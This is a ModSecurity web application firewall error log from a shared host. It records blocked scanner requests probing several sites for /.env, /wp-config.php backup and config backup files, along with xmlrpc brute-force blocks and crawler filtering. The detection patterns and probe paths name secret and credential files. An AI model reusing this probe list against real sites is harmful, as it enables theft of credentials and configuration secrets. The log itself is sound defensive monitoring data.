[Tue May 26 14:04:42.819254 2026] [security2:error] [pid 578581:tid 578636] [remote 84.247.181.196:55076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVbIpm_8al1sb-umPt-hwAAYjY"]
[Tue May 26 14:04:43.397059 2026] [security2:error] [pid 578581:tid 578781] [client 45.148.10.62:44384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env"] [unique_id "ahVbI5m_8al1sb-umPt-nAAAAEY"]
[Tue May 26 14:04:43.750844 2026] [security2:error] [pid 578581:tid 578755] [client 45.148.10.62:44396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.bak"] [unique_id "ahVbI5m_8al1sb-umPt-pwAAACw"]
[Tue May 26 14:04:43.952943 2026] [security2:error] [pid 578581:tid 578727] [client 45.148.10.62:44396] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbI5m_8al1sb-umPt-xwAAABA"]
[Tue May 26 14:04:44.130848 2026] [security2:error] [pid 578581:tid 578813] [client 45.148.10.62:44396] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJJm_8al1sb-umPt-zgAAAGY"]
[Tue May 26 14:04:44.173536 2026] [security2:error] [pid 578581:tid 578724] [client 45.148.10.62:44384] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbI5m_8al1sb-umPt-ogAAAA0"]
[Tue May 26 14:04:44.293253 2026] [security2:error] [pid 578581:tid 578766] [client 45.148.10.62:44396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/backend/.env"] [unique_id "ahVbJJm_8al1sb-umPt-2gAAADc"]
[Tue May 26 14:04:44.398200 2026] [security2:error] [pid 578581:tid 578787] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbI5m_8al1sb-umPt-zQAAAEw"]
[Tue May 26 14:04:44.496016 2026] [security2:error] [pid 578581:tid 578808] [client 45.148.10.62:44396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/test.php"] [unique_id "ahVbJJm_8al1sb-umPt-5AAAAGE"]
[Tue May 26 14:04:44.683163 2026] [security2:error] [pid 578581:tid 578749] [client 45.148.10.62:44388] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJJm_8al1sb-umPt-6AAAACY"]
[Tue May 26 14:04:44.830375 2026] [security2:error] [pid 578581:tid 578754] [client 45.148.10.62:44388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.backup"] [unique_id "ahVbJJm_8al1sb-umPt-7AAAACs"]
[Tue May 26 14:04:44.996357 2026] [security2:error] [pid 578581:tid 578816] [client 45.148.10.62:44388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.orig"] [unique_id "ahVbJJm_8al1sb-umPt-9QAAAGk"]
[Tue May 26 14:04:45.142372 2026] [security2:error] [pid 578581:tid 578728] [client 45.148.10.62:44388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.old"] [unique_id "ahVbJZm_8al1sb-umPt_AgAAABE"]
[Tue May 26 14:04:45.321308 2026] [security2:error] [pid 578581:tid 578781] [client 45.148.10.62:44388] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJZm_8al1sb-umPt_BgAAAEY"]
[Tue May 26 14:04:45.466999 2026] [security2:error] [pid 578581:tid 578833] [client 45.148.10.62:44388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/.env.php.bak"] [unique_id "ahVbJZm_8al1sb-umPt_CAAAAHo"]
[Tue May 26 14:04:45.618311 2026] [security2:error] [pid 578581:tid 578717] [client 45.148.10.62:44384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVbJZm_8al1sb-umPt_DAAAAAY"]
[Tue May 26 14:04:45.800545 2026] [security2:error] [pid 578581:tid 578782] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJZm_8al1sb-umPt_FQAAAEc"]
[Tue May 26 14:04:45.990113 2026] [security2:error] [pid 578581:tid 578723] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJZm_8al1sb-umPt_IAAAAAw"]
[Tue May 26 14:04:46.179760 2026] [security2:error] [pid 578581:tid 578821] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJpm_8al1sb-umPt_JgAAAG4"]
[Tue May 26 14:04:46.312809 2026] [security2:error] [pid 578581:tid 578797] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbJZm_8al1sb-umPt_HgAAAFY"]
[Tue May 26 14:04:46.363165 2026] [security2:error] [pid 578581:tid 578761] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJpm_8al1sb-umPt_KgAAADI"]
[Tue May 26 14:04:46.569039 2026] [security2:error] [pid 578581:tid 578770] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJpm_8al1sb-umPt_LgAAADs"]
[Tue May 26 14:04:46.758317 2026] [security2:error] [pid 578581:tid 578826] [client 45.148.10.62:44398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbJpm_8al1sb-umPt_NQAAAHM"]
[Tue May 26 14:04:46.908305 2026] [security2:error] [pid 578581:tid 578817] [client 45.148.10.62:44398] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php"] [unique_id "ahVbJpm_8al1sb-umPt_PwAAAGo"]
[Tue May 26 14:04:47.422807 2026] [security2:error] [pid 578581:tid 578779] [client 45.148.10.62:51854] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.ndequipments.com"] [uri "/wp-config.php.old"] [unique_id "ahVbJ5m_8al1sb-umPt_SQAAAEQ"]
[Tue May 26 14:04:47.935973 2026] [security2:error] [pid 578581:tid 578765] [client 45.148.10.62:51858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/config.php"] [unique_id "ahVbJ5m_8al1sb-umPt_YAAAADY"]
[Tue May 26 14:04:48.134217 2026] [security2:error] [pid 578581:tid 578793] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbJ5m_8al1sb-umPt_WwAAAFI"]
[Tue May 26 14:04:48.419824 2026] [security2:error] [pid 578581:tid 578748] [client 45.148.10.62:51864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/config.php.bak"] [unique_id "ahVbKJm_8al1sb-umPt_cAAAACU"]
[Tue May 26 14:04:48.500579 2026] [security2:error] [pid 578581:tid 578817] [client 85.208.96.194:38576] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-23rd/day/2023-02-19/"] [unique_id "ahVbKJm_8al1sb-umPt_dwAAAGo"]
[Tue May 26 14:04:48.500725 2026] [security2:error] [pid 578581:tid 578817] [client 85.208.96.194:38576] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-23rd/day/2023-02-19/"] [unique_id "ahVbKJm_8al1sb-umPt_dwAAAGo"]
[Tue May 26 14:04:48.536009 2026] [security2:error] [pid 578581:tid 578770] [client 123.20.212.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbKJm_8al1sb-umPt_YwAAADs"]
[Tue May 26 14:04:48.637803 2026] [security2:error] [pid 578581:tid 578728] [client 91.169.4.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbKJm_8al1sb-umPt_ZgAAABE"]
[Tue May 26 14:04:48.940286 2026] [security2:error] [pid 578581:tid 578823] [client 45.148.10.62:51866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbKJm_8al1sb-umPt_ewAAAHA"]
[Tue May 26 14:04:49.244544 2026] [security2:error] [pid 578581:tid 578787] [client 45.148.10.62:51866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbKZm_8al1sb-umPt_jwAAAEw"]
[Tue May 26 14:04:49.424645 2026] [security2:error] [pid 578581:tid 578802] [client 45.148.10.62:51866] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahVbKZm_8al1sb-umPt_lwAAAFs"]
[Tue May 26 14:04:49.570007 2026] [security2:error] [pid 578581:tid 578718] [client 45.148.10.62:51866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVbKZm_8al1sb-umPt_nQAAAAc"]
[Tue May 26 14:04:50.022305 2026] [security2:error] [pid 578581:tid 578818] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbKZm_8al1sb-umPt_oAAAAGs"]
[Tue May 26 14:04:51.295568 2026] [security2:error] [pid 578581:tid 578751] [client 202.141.30.10:65474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbK5m_8al1sb-umPt_1AAAACg"]
[Tue May 26 14:04:51.295681 2026] [security2:error] [pid 578581:tid 578751] [client 202.141.30.10:65474] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbK5m_8al1sb-umPt_1AAAACg"]
[Tue May 26 14:04:51.790658 2026] [security2:error] [pid 578581:tid 578830] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbK5m_8al1sb-umPt_1wAAAHc"]
[Tue May 26 14:04:53.801190 2026] [security2:error] [pid 578581:tid 578838] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbLZm_8al1sb-umPuAHgAAAH8"]
[Tue May 26 14:04:54.468329 2026] [security2:error] [pid 578581:tid 578691] [remote 74.7.241.58:35166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVbLpm_8al1sb-umPuAOgAAb20"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Site_Health
[Tue May 26 14:04:55.222501 2026] [security2:error] [pid 578581:tid 578768] [client 74.7.230.31:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVbLpm_8al1sb-umPuAQQAAADk"]
[Tue May 26 14:04:55.222535 2026] [security2:error] [pid 578581:tid 578768] [client 74.7.230.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVbLpm_8al1sb-umPuAQQAAADk"]
[Tue May 26 14:04:55.222982 2026] [security2:error] [pid 578581:tid 578760] [client 74.7.230.31:58176] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahVbLpm_8al1sb-umPuAPwAAADE"]
[Tue May 26 14:04:55.632155 2026] [security2:error] [pid 578581:tid 578800] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbL5m_8al1sb-umPuATwAAAFk"]
[Tue May 26 14:04:57.382901 2026] [security2:error] [pid 578581:tid 578750] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbMJm_8al1sb-umPuAigAAACc"]
[Tue May 26 14:04:59.202703 2026] [security2:error] [pid 578581:tid 578739] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbMpm_8al1sb-umPuAvQAAABw"]
[Tue May 26 14:05:00.992769 2026] [security2:error] [pid 578581:tid 578720] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbNJm_8al1sb-umPuBFAAAAAk"]
[Tue May 26 14:05:02.180055 2026] [security2:error] [pid 578581:tid 578800] [client 202.141.30.10:65386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbNpm_8al1sb-umPuBUQAAAFk"]
[Tue May 26 14:05:02.180586 2026] [security2:error] [pid 578581:tid 578800] [client 202.141.30.10:65386] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbNpm_8al1sb-umPuBUQAAAFk"]
[Tue May 26 14:05:03.279360 2026] [security2:error] [pid 578581:tid 578814] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbNpm_8al1sb-umPuBbAAAAGc"]
[Tue May 26 14:05:04.015659 2026] [security2:error] [pid 578581:tid 578793] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbN5m_8al1sb-umPuBggAAAFI"]
[Tue May 26 14:05:06.429366 2026] [security2:error] [pid 578581:tid 578793] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbOZm_8al1sb-umPuBxwAAAFI"]
[Tue May 26 14:05:07.633902 2026] [security2:error] [pid 578581:tid 578739] [client 14.249.29.2:48210] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVbO5m_8al1sb-umPuB8wAAABw"]
[Tue May 26 14:05:07.633945 2026] [security2:error] [pid 578581:tid 578739] [client 14.249.29.2:48210] ModSecurity: Access denied with code 409 (phase 2). Match of "eq 1" against "&REQUEST_COOKIES:humans_21909" required. [file "/opt/mod_security/hg_rules.conf"] [line "1552"] [id "900424"] [msg "Transparent Bot Detection for Contact Forms"] [hostname "ameritradeng.com"] [uri "/contact.php"] [unique_id "ahVbO5m_8al1sb-umPuB8wAAABw"]
[Tue May 26 14:05:07.741565 2026] [security2:error] [pid 578581:tid 578780] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbO5m_8al1sb-umPuB8gAAAEU"]
[Tue May 26 14:05:10.063437 2026] [security2:error] [pid 578581:tid 578807] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbPZm_8al1sb-umPuCOgAAAGA"]
[Tue May 26 14:05:11.496892 2026] [security2:error] [pid 578581:tid 578820] [client 106.217.75.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbP5m_8al1sb-umPuCXAAAAG0"]
[Tue May 26 14:05:12.116496 2026] [security2:error] [pid 578581:tid 578823] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbP5m_8al1sb-umPuCeQAAAHA"]
[Tue May 26 14:05:13.066537 2026] [security2:error] [pid 578581:tid 578723] [client 202.141.30.10:65425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbQJm_8al1sb-umPuCpwAAAAw"]
[Tue May 26 14:05:13.066718 2026] [security2:error] [pid 578581:tid 578723] [client 202.141.30.10:65425] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbQJm_8al1sb-umPuCpwAAAAw"]
[Tue May 26 14:05:13.248176 2026] [security2:error] [pid 578581:tid 578758] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbQJm_8al1sb-umPuCowAAAC8"]
[Tue May 26 14:05:15.282824 2026] [security2:error] [pid 578581:tid 578835] [client 104.28.68.80:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbQ5m_8al1sb-umPuC4gAAAHw"]
